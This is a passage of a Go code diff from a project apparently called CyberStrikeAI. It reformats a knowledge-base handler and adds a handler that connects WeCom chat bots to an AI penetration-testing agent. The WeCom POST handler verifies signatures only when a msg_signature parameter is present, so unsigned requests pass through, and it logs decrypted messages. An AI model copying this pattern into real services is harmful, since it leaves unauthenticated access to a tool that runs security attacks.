@@ -102,12 +102,12 @@ func (h *KnowledgeHandler) GetItems(c *gin.Context) {
})
return
}
// 分页模式:categoryPage=true 表示按分类分页,否则按项分页(向后兼容)
categoryPageMode := c.Query("categoryPage") != "false" // 默认使用分类分页
// 分页参数
limit := 50 // 默认每页50条(分类分页时为分类数,项分页时为项数)
limit := 50 // 默认每页 50 条(分类分页时为分类数,项分页时为项数)
offset := 0
if limitStr := c.Query("limit"); limitStr != "" {
if parsed, err := parseInt(limitStr); err == nil && parsed > 0 && parsed <= 500 {
@@ -120,7 +120,7 @@ func (h *KnowledgeHandler) GetItems(c *gin.Context) {
}
}
// 如果指定了category参数,且使用分类分页模式,则只返回该分类
// 如果指定了 category 参数,且使用分类分页模式,则只返回该分类
if category != "" && categoryPageMode {
// 单分类模式:返回该分类的所有知识项(不分页)
items, total, err := h.manager.GetItemsSummary(category, 0, 0)
@@ -150,9 +150,9 @@ func (h *KnowledgeHandler) GetItems(c *gin.Context) {
if categoryPageMode {
// 按分类分页模式(默认)
// limit表示每页分类数,推荐5-10个分类
// limit 表示每页分类数,推荐 5-10 个分类
if limit <= 0 || limit > 100 {
limit = 10 // 默认每页10个分类
limit = 10 // 默认每页 10 个分类
}
categoriesWithItems, totalCategories, err := h.manager.GetCategoriesWithItems(limit, offset)
@@ -172,7 +172,7 @@ func (h *KnowledgeHandler) GetItems(c *gin.Context) {
}
// 按项分页模式(向后兼容)
// 是否包含完整内容(默认false,只返回摘要)
// 是否包含完整内容(默认 false,只返回摘要)
includeContent := c.Query("includeContent") == "true"
if includeContent {
@@ -192,9 +192,9 @@ func (h *KnowledgeHandler) GetItems(c *gin.Context) {
}
c.JSON(http.StatusOK, gin.H{
"items": items,
"total": total,
"limit": limit,
"items": items,
"total": total,
"limit": limit,
"offset": offset,
})
} else {
@@ -207,9 +207,9 @@ func (h *KnowledgeHandler) GetItems(c *gin.Context) {
}
c.JSON(http.StatusOK, gin.H{
"items": items,
"total": total,
"limit": limit,
"items": items,
"total": total,
"limit": limit,
"offset": offset,
})
}
@@ -341,12 +341,12 @@ func (h *KnowledgeHandler) ScanKnowledgeBase(c *gin.Context) {
consecutiveFailures := 0
var firstFailureItemID string
var firstFailureError error
for i, itemID := range itemsToIndex {
if err := h.indexer.IndexItem(ctx, itemID); err != nil {
failedCount++
consecutiveFailures++
// 只在第一个失败时记录详细日志
if consecutiveFailures == 1 {
firstFailureItemID = itemID
@@ -357,8 +357,8 @@ func (h *KnowledgeHandler) ScanKnowledgeBase(c *gin.Context) {
zap.Error(err),
)
}
// 如果连续失败2次,立即停止增量索引
// 如果连续失败 2 次,立即停止增量索引
if consecutiveFailures >= 2 {
h.logger.Error("连续索引失败次数过多,立即停止增量索引",
zap.Int("consecutiveFailures", consecutiveFailures),
@@ -371,14 +371,14 @@ func (h *KnowledgeHandler) ScanKnowledgeBase(c *gin.Context) {
}
continue
}
// 成功时重置连续失败计数
if consecutiveFailures > 0 {
consecutiveFailures = 0
firstFailureItemID = ""
firstFailureError = nil
}
// 减少进度日志频率
if (i+1)%10 == 0 || i+1 == len(itemsToIndex) {
h.logger.Info("索引进度", zap.Int("current", i+1), zap.Int("total", len(itemsToIndex)), zap.Int("failed", failedCount))
@@ -388,7 +388,7 @@ func (h *KnowledgeHandler) ScanKnowledgeBase(c *gin.Context) {
}()
c.JSON(http.StatusOK, gin.H{
"message": fmt.Sprintf("扫描完成,开始索引 %d 个新添加或更新的知识项", len(itemsToIndex)),
"message": fmt.Sprintf("扫描完成,开始索引 %d 个新添加或更新的知识项", len(itemsToIndex)),
"items_to_index": len(itemsToIndex),
})
}
@@ -397,7 +397,7 @@ func (h *KnowledgeHandler) ScanKnowledgeBase(c *gin.Context) {
func (h *KnowledgeHandler) GetRetrievalLogs(c *gin.Context) {
conversationID := c.Query("conversationId")
messageID := c.Query("messageId")
limit := 50 // 默认50条
limit := 50 // 默认 50
if limitStr := c.Query("limit"); limitStr != "" {
if parsed, err := parseInt(limitStr); err == nil && parsed > 0 {
@@ -441,18 +441,40 @@ func (h *KnowledgeHandler) GetIndexStatus(c *gin.Context) {
if h.indexer != nil {
lastError, lastErrorTime := h.indexer.GetLastError()
if lastError != "" {
// 如果错误是最近发生的(5分钟内),则返回错误信息
// 如果错误是最近发生的(5 分钟内),则返回错误信息
if time.Since(lastErrorTime) < 5*time.Minute {
status["last_error"] = lastError
status["last_error_time"] = lastErrorTime.Format(time.RFC3339)
}
}
// 获取重建索引状态
isRebuilding, totalItems, current, failed, lastItemID, lastChunks, startTime := h.indexer.GetRebuildStatus()
if isRebuilding {
status["is_rebuilding"] = true
status["rebuild_total"] = totalItems
status["rebuild_current"] = current
status["rebuild_failed"] = failed
status["rebuild_start_time"] = startTime.Format(time.RFC3339)
if lastItemID != "" {
status["rebuild_last_item_id"] = lastItemID
}
if lastChunks > 0 {
status["rebuild_last_chunks"] = lastChunks
}
// 重建中时,is_complete 为 false
status["is_complete"] = false
// 计算重建进度百分比
if totalItems > 0 {
status["progress_percent"] = float64(current) / float64(totalItems) * 100
}
}
}
c.JSON(http.StatusOK, status)
}
// Search 搜索知识库(用于API调用,Agent内部使用Retriever
// Search 搜索知识库(用于 API 调用,Agent 内部使用 Retriever
func (h *KnowledgeHandler) Search(c *gin.Context) {
var req knowledge.SearchRequest
if err := c.ShouldBindJSON(&req); err != nil {
@@ -470,10 +492,25 @@ func (h *KnowledgeHandler) Search(c *gin.Context) {
c.JSON(http.StatusOK, gin.H{"results": results})
}
// GetStats 获取知识库统计信息
func (h *KnowledgeHandler) GetStats(c *gin.Context) {
totalCategories, totalItems, err := h.manager.GetStats()
if err != nil {
h.logger.Error("获取知识库统计信息失败", zap.Error(err))
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
return
}
c.JSON(http.StatusOK, gin.H{
"enabled": true,
"total_categories": totalCategories,
"total_items": totalItems,
})
}
// 辅助函数:解析整数
func parseInt(s string) (int, error) {
var result int
_, err := fmt.Sscanf(s, "%d", &result)
return result, err
}
File diff suppressed because it is too large Load Diff
+897
View File
@@ -0,0 +1,897 @@
package handler
import (
"bytes"
"context"
"crypto/aes"
"crypto/cipher"
"crypto/rand"
"crypto/sha1"
"encoding/base64"
"encoding/binary"
"encoding/json"
"encoding/xml"
"errors"
"fmt"
"io"
"net/http"
"sort"
"strings"
"sync"
"time"
"cyberstrike-ai/internal/config"
"cyberstrike-ai/internal/database"
"github.com/gin-gonic/gin"
"go.uber.org/zap"
)
const (
robotCmdHelp = "帮助"
robotCmdList = "列表"
robotCmdListAlt = "对话列表"
robotCmdSwitch = "切换"
robotCmdContinue = "继续"
robotCmdNew = "新对话"
robotCmdClear = "清空"
robotCmdCurrent = "当前"
robotCmdStop = "停止"
robotCmdRoles = "角色"
robotCmdRolesList = "角色列表"
robotCmdSwitchRole = "切换角色"
robotCmdDelete = "删除"
robotCmdVersion = "版本"
)
// RobotHandler 企业微信/钉钉/飞书等机器人回调处理
type RobotHandler struct {
config *config.Config
db *database.DB
agentHandler *AgentHandler
logger *zap.Logger
mu sync.RWMutex
sessions map[string]string // key: "platform_userID", value: conversationID
sessionRoles map[string]string // key: "platform_userID", value: roleName(默认"默认"
cancelMu sync.Mutex // 保护 runningCancels
runningCancels map[string]context.CancelFunc // key: "platform_userID", 用于停止命令中断任务
}
// NewRobotHandler 创建机器人处理器
func NewRobotHandler(cfg *config.Config, db *database.DB, agentHandler *AgentHandler, logger *zap.Logger) *RobotHandler {
return &RobotHandler{
config: cfg,
db: db,
agentHandler: agentHandler,
logger: logger,
sessions: make(map[string]string),
sessionRoles: make(map[string]string),
runningCancels: make(map[string]context.CancelFunc),
}
}
// sessionKey 生成会话 key
func (h *RobotHandler) sessionKey(platform, userID string) string {
return platform + "_" + userID
}
// getOrCreateConversation 获取或创建当前会话,title 用于新对话的标题(取用户首条消息前50字)
func (h *RobotHandler) getOrCreateConversation(platform, userID, title string) (convID string, isNew bool) {
h.mu.RLock()
convID = h.sessions[h.sessionKey(platform, userID)]
h.mu.RUnlock()
if convID != "" {
return convID, false
}
t := strings.TrimSpace(title)
if t == "" {
t = "新对话 " + time.Now().Format("01-02 15:04")
} else {
t = safeTruncateString(t, 50)
}
conv, err := h.db.CreateConversation(t)
if err != nil {
h.logger.Warn("创建机器人会话失败", zap.Error(err))
return "", false
}
convID = conv.ID
h.mu.Lock()
h.sessions[h.sessionKey(platform, userID)] = convID
h.mu.Unlock()
return convID, true
}
// setConversation 切换当前会话
func (h *RobotHandler) setConversation(platform, userID, convID string) {
h.mu.Lock()
h.sessions[h.sessionKey(platform, userID)] = convID
h.mu.Unlock()
}
// getRole 获取当前用户使用的角色,未设置时返回"默认"
func (h *RobotHandler) getRole(platform, userID string) string {
h.mu.RLock()
role := h.sessionRoles[h.sessionKey(platform, userID)]
h.mu.RUnlock()
if role == "" {
return "默认"
}
return role
}
// setRole 设置当前用户使用的角色
func (h *RobotHandler) setRole(platform, userID, roleName string) {
h.mu.Lock()
h.sessionRoles[h.sessionKey(platform, userID)] = roleName
h.mu.Unlock()
}
// clearConversation 清空当前会话(切换到新对话)
func (h *RobotHandler) clearConversation(platform, userID string) (newConvID string) {
title := "新对话 " + time.Now().Format("01-02 15:04")
conv, err := h.db.CreateConversation(title)
if err != nil {
h.logger.Warn("创建新对话失败", zap.Error(err))
return ""
}
h.setConversation(platform, userID, conv.ID)
return conv.ID
}
// HandleMessage 处理用户输入,返回回复文本(供各平台 webhook 调用)
func (h *RobotHandler) HandleMessage(platform, userID, text string) (reply string) {
text = strings.TrimSpace(text)
if text == "" {
return "请输入内容或发送「帮助」/ help 查看命令。"
}
// 先尝试作为命令处理(支持中英文)
if cmdReply, ok := h.handleRobotCommand(platform, userID, text); ok {
return cmdReply
}
// 普通消息:走 Agent
convID, _ := h.getOrCreateConversation(platform, userID, text)
if convID == "" {
return "无法创建或获取对话,请稍后再试。"
}
// 若对话标题为「新对话 xx:xx」格式(由「新对话」命令创建),将标题更新为首条消息内容,与 Web 端体验一致
if conv, err := h.db.GetConversation(convID); err == nil && strings.HasPrefix(conv.Title, "新对话 ") {
newTitle := safeTruncateString(text, 50)
if newTitle != "" {
_ = h.db.UpdateConversationTitle(convID, newTitle)
}
}
ctx, cancel := context.WithTimeout(context.Background(), 5*time.Minute)
sk := h.sessionKey(platform, userID)
h.cancelMu.Lock()
h.runningCancels[sk] = cancel
h.cancelMu.Unlock()
defer func() {
cancel()
h.cancelMu.Lock()
delete(h.runningCancels, sk)
h.cancelMu.Unlock()
}()
role := h.getRole(platform, userID)
resp, newConvID, err := h.agentHandler.ProcessMessageForRobot(ctx, convID, text, role)
if err != nil {
h.logger.Warn("机器人 Agent 执行失败", zap.String("platform", platform), zap.String("userID", userID), zap.Error(err))
if errors.Is(err, context.Canceled) {
return "任务已取消。"
}
return "处理失败: " + err.Error()
}
if newConvID != convID {
h.setConversation(platform, userID, newConvID)
}
return resp
}
func (h *RobotHandler) cmdHelp() string {
return "**【CyberStrikeAI 机器人命令】**\n\n" +
"- `帮助` `help` — 显示本帮助 | Show this help\n" +
"- `列表` `list` — 列出所有对话标题与 ID | List conversations\n" +
"- `切换 <ID>` `switch <ID>` — 指定对话继续 | Switch to conversation\n" +
"- `新对话` `new` — 开启新对话 | Start new conversation\n" +
"- `清空` `clear` — 清空当前上下文 | Clear context\n" +
"- `当前` `current` — 显示当前对话 ID 与标题 | Show current conversation\n" +
"- `停止` `stop` — 中断当前任务 | Stop running task\n" +
"- `角色` `roles` — 列出所有可用角色 | List roles\n" +
"- `角色 <名>` `role <name>` — 切换当前角色 | Switch role\n" +
"- `删除 <ID>` `delete <ID>` — 删除指定对话 | Delete conversation\n" +
"- `版本` `version` — 显示当前版本号 | Show version\n\n" +
"---\n" +
"除以上命令外,直接输入内容将发送给 AI 进行渗透测试/安全分析。\n" +
"Otherwise, send any text for AI penetration testing / security analysis."
}
func (h *RobotHandler) cmdList() string {
convs, err := h.db.ListConversations(50, 0, "")
if err != nil {
return "获取对话列表失败: " + err.Error()
}
if len(convs) == 0 {
return "暂无对话。发送任意内容将自动创建新对话。"
}
var b strings.Builder
b.WriteString("【对话列表】\n")
for i, c := range convs {
if i >= 20 {
b.WriteString("… 仅显示前 20 条\n")
break
}
b.WriteString(fmt.Sprintf("· %s\n ID: %s\n", c.Title, c.ID))
}
return strings.TrimSuffix(b.String(), "\n")
}
func (h *RobotHandler) cmdSwitch(platform, userID, convID string) string {
if convID == "" {
return "请指定对话 ID,例如:切换 xxx-xxx-xxx"
}
conv, err := h.db.GetConversation(convID)
if err != nil {
return "对话不存在或 ID 错误。"
}
h.setConversation(platform, userID, conv.ID)
return fmt.Sprintf("已切换到对话:「%s」\nID: %s", conv.Title, conv.ID)
}
func (h *RobotHandler) cmdNew(platform, userID string) string {
newID := h.clearConversation(platform, userID)
if newID == "" {
return "创建新对话失败,请重试。"
}
return "已开启新对话,可直接发送内容。"
}
func (h *RobotHandler) cmdClear(platform, userID string) string {
return h.cmdNew(platform, userID)
}
func (h *RobotHandler) cmdStop(platform, userID string) string {
sk := h.sessionKey(platform, userID)
h.cancelMu.Lock()
cancel, ok := h.runningCancels[sk]
if ok {
delete(h.runningCancels, sk)
cancel()
}
h.cancelMu.Unlock()
if !ok {
return "当前没有正在执行的任务。"
}
return "已停止当前任务。"
}
func (h *RobotHandler) cmdCurrent(platform, userID string) string {
h.mu.RLock()
convID := h.sessions[h.sessionKey(platform, userID)]
h.mu.RUnlock()
if convID == "" {
return "当前没有进行中的对话。发送任意内容将创建新对话。"
}
conv, err := h.db.GetConversation(convID)
if err != nil {
return "当前对话 ID: " + convID + "(获取标题失败)"
}
role := h.getRole(platform, userID)
return fmt.Sprintf("当前对话:「%s」\nID: %s\n当前角色: %s", conv.Title, conv.ID, role)
}
func (h *RobotHandler) cmdRoles() string {
if h.config.Roles == nil || len(h.config.Roles) == 0 {
return "暂无可用角色。"
}
names := make([]string, 0, len(h.config.Roles))
for name, role := range h.config.Roles {
if role.Enabled {
names = append(names, name)
}
}
if len(names) == 0 {
return "暂无可用角色。"
}
sort.Slice(names, func(i, j int) bool {
if names[i] == "默认" {
return true
}
if names[j] == "默认" {
return false
}
return names[i] < names[j]
})
var b strings.Builder
b.WriteString("【角色列表】\n")
for _, name := range names {
role := h.config.Roles[name]
desc := role.Description
if desc == "" {
desc = "无描述"
}
b.WriteString(fmt.Sprintf("· %s — %s\n", name, desc))
}
return strings.TrimSuffix(b.String(), "\n")
}
func (h *RobotHandler) cmdSwitchRole(platform, userID, roleName string) string {
if roleName == "" {
return "请指定角色名称,例如:角色 渗透测试"
}
if h.config.Roles == nil {
return "暂无可用角色。"
}
role, exists := h.config.Roles[roleName]
if !exists {
return fmt.Sprintf("角色「%s」不存在。发送「角色」查看可用角色。", roleName)
}
if !role.Enabled {
return fmt.Sprintf("角色「%s」已禁用。", roleName)
}
h.setRole(platform, userID, roleName)
return fmt.Sprintf("已切换到角色:「%s」\n%s", roleName, role.Description)
}
func (h *RobotHandler) cmdDelete(platform, userID, convID string) string {
if convID == "" {
return "请指定对话 ID,例如:删除 xxx-xxx-xxx"
}
sk := h.sessionKey(platform, userID)
h.mu.RLock()
currentConvID := h.sessions[sk]
h.mu.RUnlock()
if convID == currentConvID {
// 删除当前对话时,先清空会话绑定
h.mu.Lock()
delete(h.sessions, sk)
h.mu.Unlock()
}
if err := h.db.DeleteConversation(convID); err != nil {
return "删除失败: " + err.Error()
}
return fmt.Sprintf("已删除对话 ID: %s", convID)
}
func (h *RobotHandler) cmdVersion() string {
v := h.config.Version
if v == "" {
v = "未知"
}
return "CyberStrikeAI " + v
}
// handleRobotCommand 处理机器人内置命令;若匹配到命令返回 (回复内容, true),否则返回 ("", false)
func (h *RobotHandler) handleRobotCommand(platform, userID, text string) (string, bool) {
switch {
case text == robotCmdHelp || text == "help" || text == "" || text == "?":
return h.cmdHelp(), true
case text == robotCmdList || text == robotCmdListAlt || text == "list":
return h.cmdList(), true
case strings.HasPrefix(text, robotCmdSwitch+" ") || strings.HasPrefix(text, robotCmdContinue+" ") || strings.HasPrefix(text, "switch ") || strings.HasPrefix(text, "continue "):
var id string
switch {
case strings.HasPrefix(text, robotCmdSwitch+" "):
id = strings.TrimSpace(text[len(robotCmdSwitch)+1:])
case strings.HasPrefix(text, robotCmdContinue+" "):
id = strings.TrimSpace(text[len(robotCmdContinue)+1:])
case strings.HasPrefix(text, "switch "):
id = strings.TrimSpace(text[7:])
default:
id = strings.TrimSpace(text[9:])
}
return h.cmdSwitch(platform, userID, id), true
case text == robotCmdNew || text == "new":
return h.cmdNew(platform, userID), true
case text == robotCmdClear || text == "clear":
return h.cmdClear(platform, userID), true
case text == robotCmdCurrent || text == "current":
return h.cmdCurrent(platform, userID), true
case text == robotCmdStop || text == "stop":
return h.cmdStop(platform, userID), true
case text == robotCmdRoles || text == robotCmdRolesList || text == "roles":
return h.cmdRoles(), true
case strings.HasPrefix(text, robotCmdRoles+" ") || strings.HasPrefix(text, robotCmdSwitchRole+" ") || strings.HasPrefix(text, "role "):
var roleName string
switch {
case strings.HasPrefix(text, robotCmdRoles+" "):
roleName = strings.TrimSpace(text[len(robotCmdRoles)+1:])
case strings.HasPrefix(text, robotCmdSwitchRole+" "):
roleName = strings.TrimSpace(text[len(robotCmdSwitchRole)+1:])
default:
roleName = strings.TrimSpace(text[5:])
}
return h.cmdSwitchRole(platform, userID, roleName), true
case strings.HasPrefix(text, robotCmdDelete+" ") || strings.HasPrefix(text, "delete "):
var convID string
if strings.HasPrefix(text, robotCmdDelete+" ") {
convID = strings.TrimSpace(text[len(robotCmdDelete)+1:])
} else {
convID = strings.TrimSpace(text[7:])
}
return h.cmdDelete(platform, userID, convID), true
case text == robotCmdVersion || text == "version":
return h.cmdVersion(), true
default:
return "", false
}
}
// —————— 企业微信 ——————
// wecomXML 企业微信回调 XML(明文模式下的简化结构;加密模式需先解密再解析)
type wecomXML struct {
ToUserName string `xml:"ToUserName"`
FromUserName string `xml:"FromUserName"`
CreateTime int64 `xml:"CreateTime"`
MsgType string `xml:"MsgType"`
Content string `xml:"Content"`
MsgID string `xml:"MsgId"`
AgentID int64 `xml:"AgentID"`
Encrypt string `xml:"Encrypt"` // 加密模式下消息在此
}
// wecomReplyXML 被动回复 XML(仅用于兼容,当前使用手动构造 XML)
type wecomReplyXML struct {
XMLName xml.Name `xml:"xml"`
ToUserName string `xml:"ToUserName"`
FromUserName string `xml:"FromUserName"`
CreateTime int64 `xml:"CreateTime"`
MsgType string `xml:"MsgType"`
Content string `xml:"Content"`
}
// HandleWecomGET 企业微信 URL 校验(GET
func (h *RobotHandler) HandleWecomGET(c *gin.Context) {
if !h.config.Robots.Wecom.Enabled {
c.String(http.StatusNotFound, "")
return
}
// Gin 的 Query() 会自动 URL 解码,拿到的就是正确的 base64 字符串
echostr := c.Query("echostr")
msgSignature := c.Query("msg_signature")
timestamp := c.Query("timestamp")
nonce := c.Query("nonce")
// 验证签名:将 token、timestamp、nonce、echostr 四个参数排序后拼接计算 SHA1
signature := h.signWecomRequest(h.config.Robots.Wecom.Token, timestamp, nonce, echostr)
if signature != msgSignature {
h.logger.Warn("企业微信 URL 验证签名失败", zap.String("expected", msgSignature), zap.String("got", signature))
c.String(http.StatusBadRequest, "invalid signature")
return
}
if echostr == "" {
c.String(http.StatusBadRequest, "missing echostr")
return
}
// 如果配置了 EncodingAESKey,说明是加密模式,需要解密 echostr
if h.config.Robots.Wecom.EncodingAESKey != "" {
decrypted, err := wecomDecrypt(h.config.Robots.Wecom.EncodingAESKey, echostr)
if err != nil {
h.logger.Warn("企业微信 echostr 解密失败", zap.Error(err))
c.String(http.StatusBadRequest, "decrypt failed")
return
}
c.String(http.StatusOK, string(decrypted))
return
}
// 明文模式直接返回 echostr
c.String(http.StatusOK, echostr)
}
// signWecomRequest 生成企业微信请求签名
// 企业微信签名算法:将 token、timestamp、nonce、echostr 四个值排序后拼接成字符串,再计算 SHA1
func (h *RobotHandler) signWecomRequest(token, timestamp, nonce, echostr string) string {
strs := []string{token, timestamp, nonce, echostr}
sort.Strings(strs)
s := strings.Join(strs, "")
hash := sha1.Sum([]byte(s))
return fmt.Sprintf("%x", hash)
}
// wecomDecrypt 企业微信消息解密(AES-256-CBC,PKCS7,明文格式:16字节随机+4字节长度+消息+corpID)
func wecomDecrypt(encodingAESKey, encryptedB64 string) ([]byte, error) {
key, err := base64.StdEncoding.DecodeString(encodingAESKey + "=")
if err != nil {
return nil, err
}
if len(key) != 32 {
return nil, fmt.Errorf("encoding_aes_key 解码后应为 32 字节")
}
ciphertext, err := base64.StdEncoding.DecodeString(encryptedB64)
if err != nil {
return nil, err
}
block, err := aes.NewCipher(key)
if err != nil {
return nil, err
}
iv := key[:16]
mode := cipher.NewCBCDecrypter(block, iv)
if len(ciphertext)%aes.BlockSize != 0 {
return nil, fmt.Errorf("密文长度不是块大小的倍数")
}
plain := make([]byte, len(ciphertext))
mode.CryptBlocks(plain, ciphertext)
// 去除 PKCS7 填充
n := int(plain[len(plain)-1])
if n < 1 || n > 32 {
return nil, fmt.Errorf("无效的 PKCS7 填充")
}
plain = plain[:len(plain)-n]
// 企业微信格式:16 字节随机 + 4 字节长度(大端) + 消息 + corpID
if len(plain) < 20 {
return nil, fmt.Errorf("明文过短")
}
msgLen := binary.BigEndian.Uint32(plain[16:20])
if int(20+msgLen) > len(plain) {
return nil, fmt.Errorf("消息长度越界")
}
return plain[20 : 20+msgLen], nil
}
// wecomEncrypt 企业微信消息加密(AES-256-CBC,PKCS7,明文格式:16字节随机+4字节长度+消息+corpID)
func wecomEncrypt(encodingAESKey, message, corpID string) (string, error) {
key, err := base64.StdEncoding.DecodeString(encodingAESKey + "=")
if err != nil {
return "", err
}
if len(key) != 32 {
return "", fmt.Errorf("encoding_aes_key 解码后应为 32 字节")
}
// 构造明文:16 字节随机 + 4 字节长度 (大端) + 消息 + corpID
random := make([]byte, 16)
if _, err := rand.Read(random); err != nil {
// 降级方案:使用时间戳生成随机数
for i := range random {
random[i] = byte(time.Now().UnixNano() % 256)
}
}
msgLen := len(message)
msgBytes := []byte(message)
corpBytes := []byte(corpID)
plain := make([]byte, 16+4+msgLen+len(corpBytes))
copy(plain[:16], random)
binary.BigEndian.PutUint32(plain[16:20], uint32(msgLen))
copy(plain[20:20+msgLen], msgBytes)
copy(plain[20+msgLen:], corpBytes)
// PKCS7 填充
padding := aes.BlockSize - len(plain)%aes.BlockSize
pad := bytes.Repeat([]byte{byte(padding)}, padding)
plain = append(plain, pad...)
// AES-256-CBC 加密
block, err := aes.NewCipher(key)
if err != nil {
return "", err
}
iv := key[:16]
ciphertext := make([]byte, len(plain))
mode := cipher.NewCBCEncrypter(block, iv)
mode.CryptBlocks(ciphertext, plain)
return base64.StdEncoding.EncodeToString(ciphertext), nil
}
// HandleWecomPOST 企业微信消息回调(POST),支持明文与加密模式
func (h *RobotHandler) HandleWecomPOST(c *gin.Context) {
if !h.config.Robots.Wecom.Enabled {
h.logger.Debug("企业微信机器人未启用,跳过请求")
c.String(http.StatusOK, "")
return
}
// 从 URL 获取签名参数(加密模式回复时需要用到)
timestamp := c.Query("timestamp")
nonce := c.Query("nonce")
msgSignature := c.Query("msg_signature")
// 先读取请求体,后续解析/签名验证都会用到
bodyRaw, err := io.ReadAll(c.Request.Body)
if err != nil {
h.logger.Warn("企业微信 POST 读取请求体失败", zap.Error(err))
c.String(http.StatusOK, "")
return
}
h.logger.Debug("企业微信 POST 收到请求", zap.String("body", string(bodyRaw)))
// 验证请求签名防止伪造。企业微信签名算法同 URL 验证,使用 token、timestamp、nonce、 Encrypt 四个字段
if msgSignature != "" {
var tmp wecomXML
if err := xml.Unmarshal(bodyRaw, &tmp); err == nil {
expected := h.signWecomRequest(h.config.Robots.Wecom.Token, timestamp, nonce, tmp.Encrypt)
if expected != msgSignature {
h.logger.Warn("企业微信 POST 签名验证失败", zap.String("expected", expected), zap.String("got", msgSignature))
c.String(http.StatusOK, "")
return
}
}
}
var body wecomXML
if err := xml.Unmarshal(bodyRaw, &body); err != nil {
h.logger.Warn("企业微信 POST 解析 XML 失败", zap.Error(err))
c.String(http.StatusOK, "")
return
}
h.logger.Debug("企业微信 XML 解析成功", zap.String("ToUserName", body.ToUserName), zap.String("FromUserName", body.FromUserName), zap.String("MsgType", body.MsgType), zap.String("Content", body.Content), zap.String("Encrypt", body.Encrypt))
// 保存企业 ID(用于明文模式回复)
enterpriseID := body.ToUserName
// 加密模式:先解密再解析内层 XML
if body.Encrypt != "" && h.config.Robots.Wecom.EncodingAESKey != "" {
h.logger.Debug("企业微信进入加密模式解密流程")
decrypted, err := wecomDecrypt(h.config.Robots.Wecom.EncodingAESKey, body.Encrypt)
if err != nil {
h.logger.Warn("企业微信消息解密失败", zap.Error(err))
c.String(http.StatusOK, "")
return
}
h.logger.Debug("企业微信解密成功", zap.String("decrypted", string(decrypted)))
if err := xml.Unmarshal(decrypted, &body); err != nil {
h.logger.Warn("企业微信解密后 XML 解析失败", zap.Error(err))
c.String(http.StatusOK, "")
return
}
h.logger.Debug("企业微信内层 XML 解析成功", zap.String("FromUserName", body.FromUserName), zap.String("Content", body.Content))
}
userID := body.FromUserName
text := strings.TrimSpace(body.Content)
// 限制回复内容长度(企业微信限制 2048 字节)
maxReplyLen := 2000
limitReply := func(s string) string {
if len(s) > maxReplyLen {
return s[:maxReplyLen] + "\n\n(内容过长,已截断)"
}
return s
}
if body.MsgType != "text" {
h.logger.Debug("企业微信收到非文本消息", zap.String("MsgType", body.MsgType))
h.sendWecomReply(c, userID, enterpriseID, limitReply("暂仅支持文本消息,请发送文字。"), timestamp, nonce)
return
}
// 文本消息:先判断是否为内置命令(如 帮助/列表/新对话 等),这类命令处理很快,可以直接走被动回复,避免依赖主动发送 API。
if cmdReply, ok := h.handleRobotCommand("wecom", userID, text); ok {
h.logger.Debug("企业微信收到命令消息,走被动回复", zap.String("userID", userID), zap.String("text", text))
h.sendWecomReply(c, userID, enterpriseID, limitReply(cmdReply), timestamp, nonce)
return
}
h.logger.Debug("企业微信开始处理消息(异步 AI)", zap.String("userID", userID), zap.String("text", text))
// 企业微信被动回复有 5 秒超时限制,而 AI 调用通常超过该时长。
// 这里采用推荐做法:立即返回 success(或空串),然后通过主动发送接口推送完整回复。
c.String(http.StatusOK, "success")
// 异步处理消息并通过企业微信主动消息接口发送结果
go func() {
reply := h.HandleMessage("wecom", userID, text)
reply = limitReply(reply)
h.logger.Debug("企业微信消息处理完成", zap.String("userID", userID), zap.String("reply", reply))
// 调用企业微信 API 主动发送消息
h.sendWecomMessageViaAPI(userID, enterpriseID, reply)
}()
}
// sendWecomReply 发送企业微信回复(加密模式自动加密)
// 参数:toUser=用户 ID, fromUser=企业 ID(明文模式)/CorpID(加密模式), content=回复内容,timestamp/nonce=请求参数
func (h *RobotHandler) sendWecomReply(c *gin.Context, toUser, fromUser, content, timestamp, nonce string) {
// 加密模式:判断 EncodingAESKey 是否配置
if h.config.Robots.Wecom.EncodingAESKey != "" {
// 加密模式使用 CorpID 进行加密
corpID := h.config.Robots.Wecom.CorpID
if corpID == "" {
h.logger.Warn("企业微信加密模式缺少 CorpID 配置")
c.String(http.StatusOK, "")
return
}
// 构造完整的明文 XML 回复(格式严格按企业微信文档要求)
plainResp := fmt.Sprintf(`<xml>
<ToUserName><![CDATA[%s]]></ToUserName>
<FromUserName><![CDATA[%s]]></FromUserName>
<CreateTime>%d</CreateTime>
<MsgType><![CDATA[text]]></MsgType>
<Content><![CDATA[%s]]></Content>
</xml>`, toUser, fromUser, time.Now().Unix(), content)
encrypted, err := wecomEncrypt(h.config.Robots.Wecom.EncodingAESKey, plainResp, corpID)
if err != nil {
h.logger.Warn("企业微信回复加密失败", zap.Error(err))
c.String(http.StatusOK, "")
return
}
// 使用请求中的 timestamp/nonce 生成签名(企业微信要求回复时使用与请求相同的 timestamp 和 nonce
msgSignature := h.signWecomRequest(h.config.Robots.Wecom.Token, timestamp, nonce, encrypted)
h.logger.Debug("企业微信发送加密回复",
zap.String("Encrypt", encrypted[:50]+"..."),
zap.String("MsgSignature", msgSignature),
zap.String("TimeStamp", timestamp),
zap.String("Nonce", nonce))
// 加密模式仅返回 4 个核心字段(企业微信官方要求)
xmlResp := fmt.Sprintf(`<xml><Encrypt><![CDATA[%s]]></Encrypt><MsgSignature><![CDATA[%s]]></MsgSignature><TimeStamp><![CDATA[%s]]></TimeStamp><Nonce><![CDATA[%s]]></Nonce></xml>`, encrypted, msgSignature, timestamp, nonce)
// also log the final response body so we can cross-check with the
// network traffic or developer console
h.logger.Debug("企业微信加密回复包", zap.String("xml", xmlResp))
// for additional confidence, decrypt the payload ourselves and log it
if dec, err2 := wecomDecrypt(h.config.Robots.Wecom.EncodingAESKey, encrypted); err2 == nil {
h.logger.Debug("企业微信加密回复解密检查", zap.String("plain", string(dec)))
} else {
h.logger.Warn("企业微信加密回复解密检查失败", zap.Error(err2))
}
// 使用 c.Writer.Write 直接写入响应,避免 c.String 的转义问题
c.Writer.WriteHeader(http.StatusOK)
// use text/xml as that's what WeCom examples show
c.Writer.Header().Set("Content-Type", "text/xml; charset=utf-8")
_, _ = c.Writer.Write([]byte(xmlResp))
h.logger.Debug("企业微信加密回复已发送")
return
}
// 明文模式
h.logger.Debug("企业微信发送明文回复", zap.String("ToUserName", toUser), zap.String("FromUserName", fromUser), zap.String("Content", content[:50]+"..."))
// 手动构造 XML 响应(使用 CDATA 包裹所有字段,并包含 AgentID)
xmlResp := fmt.Sprintf(`<xml>
<ToUserName><![CDATA[%s]]></ToUserName>
<FromUserName><![CDATA[%s]]></FromUserName>
<CreateTime>%d</CreateTime>
<MsgType><![CDATA[text]]></MsgType>
